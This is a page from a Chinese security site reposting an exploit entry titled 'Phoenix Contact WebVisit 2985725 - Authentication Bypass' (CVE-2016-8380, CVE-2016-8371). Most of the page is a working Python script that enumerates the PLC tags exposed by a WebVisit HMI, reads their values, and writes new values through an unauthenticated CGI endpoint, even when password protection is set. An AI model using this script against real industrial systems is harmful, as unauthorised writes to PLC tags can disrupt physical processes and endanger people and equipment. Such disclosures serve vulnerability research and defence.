首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Phoenix Contact WebVisit 2985725 - Authentication Bypass
来源:vfocus.net 作者:Photubias 发布时间:2018-10-15  
# Exploit Title: Phoenix Contact WebVisit 2985725 - Authentication Bypass
# Date: 2018-09-30
# Exploit Author: Deneut Tijl
# Vendor Homepage: www.phoenixcontact.com
# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5
# Version: WebVisit (all versions)
# CVE : CVE-2016-8380, CVE-2016-8371
 
# Description
# Script to read and write PLC tags via a Webvisit HMI page (even in case of a password protection)
# Steps:
# * Get Project Name: http://<ip>/
# * Get list of tags: http://<ip>/<projectname>.tcr
# * Get current values of tags: http://<ip>/cgi-bin/ILRReadValues.exe
# * Set new tag values: http://<ip>/cgi-bin/writeVal.exe?<tag>+<value> (urlencode!)
 
# CVE-2016-8380-SetPLCValues.py
 
#! /usr/bin/env python
 
import urllib2
 
strIP = raw_input('Please enter an IP [192.168.1.200]: ')
if strIP == '': strIP = '192.168.1.200'
 
try:
    URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))
except urllib2.HTTPError:
    print('#### Critical Error with IP ' + strIP + ': no response')
    raw_input('Press Enter to exit')
    exit()
 
strProject = ''
for line in URLResponse.readlines():
    if 'ProjectName' in line:
        strProject = line.split('VALUE="')[1].split('"')[0]
 
if strProject == '':
    print('#### Error, no \'ProjectName\' found on the main page')
    raw_input('Press Enter to exit')
    exit()
 
print('---- Found project \'' + strProject + '\', retrieving list of tags')
 
try:
    TagResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strProject + '.tcr'))
except urllib2.HTTPError:
    print('#### Critical Error with IP ' + strIP + ': /' + strProject + '.tcr not found')
    raw_input('Press Enter to exit')
    exit()
 
arrTagList = []
for line in TagResponse.readlines():
    if line.startswith('#!-- N ='):
        intNumberOfTags = int(line.split('=')[1])
        print('---- There should be ' + str(intNumberOfTags) + ' tags:')
    if not line.startswith('#'):
        if not line.split(';')[0].strip() == '':
            arrTagList.append(line.split(';')[0].strip())
            print('-- '+line.split(';')[0].strip())
 
 
raw_input('Press Enter to query them all')
import os, urllib
os.system('cls' if os.name == 'nt' else 'clear')
strPost = '<body>'
strPost += '<item_list_size>' + str(len(arrTagList)) + '</item_list_size>'
strPost += '<item_list>'
for item in arrTagList:
    strPost += '<i><n>' + item + '</n></i>'
strPost += '</item_list></body>'
DataResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/ILRReadValues.exe', strPost)).read()
 
arrData = []
for item in DataResponse.split('<i>'):
    if '<n>' in item:
        name = item.split('<n>')[1].split('</n>')[0]
        value = item.split('<v>')[1].split('</v>')[0]
        arrData.append((name,value))
print('----- Full list of tags and their values:')
i = 0
for item in arrData:
    i += 1
    print(str(i) + ': Tag ' + item[0] + ' has value: ' + item[1])
 
ans1 = raw_input('Want to change a tag? Enter a number or press Enter to quit: ')
if ans1 == '':
    exit()
strTag = arrData[int(ans1) - 1][0]
strVal = arrData[int(ans1) - 1][1]
ans2 = raw_input('Setting value for ' + strTag + ' [' + strVal + ']: ')
if ans2 == '': ans2 = strVal
urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/writeVal.exe?' + urllib.quote_plus(strTag) + '+' + str(ans2)))
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Phoenix Contact WebVisit 6.40.
·FluxBB < 1.5.6 - SQL Injection
·Microsoft SQL Server Managemen
·NoMachine 5.3.26 Remote Code E
·Microsoft SQL Server Managemen
·Solaris RSH Stack Clash Privil
·Microsoft SQL Server Managemen
·Snes9K 0.0.9z - Buffer Overflo
·VLC Media Player 2.2.8 MKV Use
·FLIR AX8 Thermal Camera 1.32.1
·DELL EMC OneFS Storage Adminis
·FLIR Brickstream 3D+ - RTSP St
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved